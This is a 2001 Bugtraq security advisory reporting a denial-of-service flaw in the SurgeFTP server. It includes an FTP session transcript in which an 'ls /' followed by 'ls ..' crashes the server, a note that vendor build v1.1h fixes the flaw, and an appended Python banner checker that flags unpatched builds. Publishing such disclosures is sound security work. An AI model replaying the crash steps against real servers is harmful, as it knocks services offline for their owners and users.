Bugtraq mailing list archives

SurgeFTP Denial of Service
From: SNS Research <vuln-dev () greyhack com>
Date: Thu, 1 Mar 2001 00:16:53 +0100

Strumpf Noir Society Advisories
! Public release !
<--#


-= SurgeFTP Denial of Service =-

Release date: Thursday, March 1, 2001


Introduction:

NetWin's SurgeFTP is an easy to manage and reliable FTP server with
detailed reporting and easy to use management features.

SurgeFTP is available for both the Unix/Linux and Windows flavours of
operating systems from the vendor's site: http://www.netwinsite.com


Problem:

Due to a design issue in the SurgeFTP server a denial of service
condition exists in it which could allow any user with local or shell
access to the host to crash the server. The problem resides in the
local handling of the directory listing command, which after first being
successfully initialized will die if followed by a "malformed" request.


Example:

# ftp localhost
Connected to testbak
220 SurgeFTP testbak (Version 1.0b)
User (testbak:(none)): anonymous
331 Password required for anonymous.
Password:
230- Alias      Real path       Access
230- /          /home           read
230 User anonymous logged in.
ftp> ls /
200 Port command successful.
150 Opening ASCII mode data connection for file list. (/)
226 Transfer complete.
ftp> ls ..
200 Port command successful.
150 Opening ASCII mode data connection for file list. (/..)
-> ftp get:Connection reset by peer


(..)


Solution:

Vendor has been notified and has verified the problem. Build v1.1h has
been released, which fixes this issue. It's available from
ftp://ftp.netwinsite.com/pub/surgeftp/


yadayadayada

Free sk8! (http://www.freesk8.org)

SNS Research is rfpolicy (http://www.wiretrip.net/rfp/policy.html)
compliant, all information is provided on AS IS basis.

EOF, but Strumpf Noir Society will return!
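
An added example, not part of the original advisory and not NetWin's code: a banner check for asset inventory that flags SurgeFTP greetings reporting a build older than the fixed v1.1h. The version ordering (number first, then build letter) and every sample banner except the one from the advisory's transcript are assumptions.

```python
import re

# Assumption: SurgeFTP versions look like "<major>.<minor><build letter>",
# e.g. "1.0b" or "1.1h", and order by number first, then by letter.
FIXED_BUILD = "1.1h"  # fixed build named in the advisory

# Greeting format taken from the advisory: "220 SurgeFTP <host> (Version <x>)"
BANNER_RE = re.compile(r"^220[ -]SurgeFTP\b.*\(Version\s+([^)\s]+)\)", re.IGNORECASE)
VERSION_RE = re.compile(r"^(\d+)\.(\d+)([a-z]?)$", re.IGNORECASE)


def parse_version(text):
    """Return (major, minor, letter), or None if the assumed scheme does not fit."""
    m = VERSION_RE.match(text.strip())
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), m.group(3).lower()


def classify_banner(banner):
    """Classify one FTP greeting line.

    Returns "not-surgeftp", "unknown-version", "needs-upgrade" or "fixed".
    """
    m = BANNER_RE.match(banner.strip())
    if not m:
        return "not-surgeftp"
    version = parse_version(m.group(1))
    if version is None:
        return "unknown-version"  # flag for manual review rather than guessing
    return "needs-upgrade" if version < parse_version(FIXED_BUILD) else "fixed"


# Constructed sample greetings; only the first comes from the advisory's transcript.
SAMPLE_BANNERS = [
    "220 SurgeFTP testbak (Version 1.0b)",
    "220 SurgeFTP ftp1 (Version 1.1h)",
    "220 SurgeFTP ftp2 (Version 1.1a)",
    "220 SurgeFTP ftp3 (Version beta)",
    "220 ProFTPD Server ready.",
]

if __name__ == "__main__":
    for line in SAMPLE_BANNERS:
        print(f"{classify_banner(line):16} {line}")
```

A banner only reports what the server claims about itself, so a "fixed" result should be confirmed against the installed package.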

